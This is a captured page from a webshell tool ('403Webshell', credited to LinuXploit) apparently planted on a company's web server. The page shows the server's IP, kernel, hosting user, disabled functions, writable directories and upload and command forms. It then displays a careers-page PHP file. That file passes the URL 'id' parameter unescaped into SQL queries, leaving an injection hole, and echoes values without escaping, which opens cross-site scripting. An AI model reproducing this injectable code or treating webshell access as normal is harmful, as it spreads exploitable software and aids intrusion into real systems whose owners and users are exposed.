403Webshell
Server IP : 108.170.25.35  /  Your IP : 3.133.115.47
Web Server : Apache/2
System : Linux gains.winzonesoftech.com 4.18.0-513.24.1.el8_9.x86_64 #1 SMP Mon Apr 8 11:23:13 EDT 2024 x86_64
User : softechwinzone ( 1579)
PHP Version : 8.1.28
Disable Function : exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/softechwinzone/public_html/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/softechwinzone/public_html/description.php
<?php include 'header.php'?>
<?php include 'navbar.php'?>
<style>
.woocommerce button.button{
	padding: 16px 28px !important;
}
.buss ul li
{
	list-style-type: disc !important;
}
</style>

		
		   <section class="p-t140 p-b100 about-p-t">
                <div class="container">
				   
                    <div class="flex-row description-box">
					 <?php
						include "admin/connect.php";
				
				           $id=$_GET['id'];
						   
						   
						   ?>
                        <div class="app-development-left-1 about-int-text align-self-center sm-m-b40">
                            <div class="ot-heading center ">
                                <h2 class="main-heading flt">Job Description</h2>
                                <h2 class="text-right"><a href="careers.php?id=<?php echo $id;?>"class="cuz-btn">Apply Now</a> <a href="vacancy.php"class="cuz-btn">Go back</a></h2>
                            </div>
							
                        <?php
				
				           $id=$_GET['id'];
							$sql1=mysqli_query($conn, "select * from career where id='$id'");
							while($row1=mysqli_fetch_array($sql1)){
								$description=$row1['description'];
								$jobtitle=$row1['jobtitle'];
								$location=$row1['location'];
						
						?>
                        <div class="row">
                        <div class="col-md-6 col-sm-6 col-xs-6">
						<h2 class="fnt15">Designation</h2>
						<p><?php echo $jobtitle;?></p>
						</div>
						  <div class="col-md-6 col-sm-6 col-xs-6">
					    <h2 class="fnt15">Location</h2>
						<p><?php echo $location;?></p>
						</div>
						</div>
						<div class="row buss">
                        <div class="col-md-12 col-sm-12 col-xs-12">
						<h2 class="fnt15">Job description:</h2>
						<p><?php echo $description;?></p>
						
						
						
						<h2 class="fnt15">Roles And Responsbility</h2>
						<ul>
						  <?php
						   $idf=$_GET['id'];
						    
							$sql2=mysqli_query($conn, "select * from responsibility where jid='$idf' ");
							while($row2=mysqli_fetch_array($sql2)){
								$responsibility=$row2['responsibility'];
						?>
						
						<li><?php echo $responsibility;?></li>
					 <?php } ?>
						</ul>
						
						
						
						
						</div>
						</div>
							
							 <?php } ?>
                        </div>


                        <div class="app-development-right-1 about-int-img text-right">
                            <div class="woocommerce">
                           <img src="img/find-job.png" alt="about winzone softech">
                         </div>
                        </div>
                    </div>
                </div>
            </section>
		
				

         <?php include 'footer.php'?>

Youez - 2016 - github.com/yon3zu
LinuXploit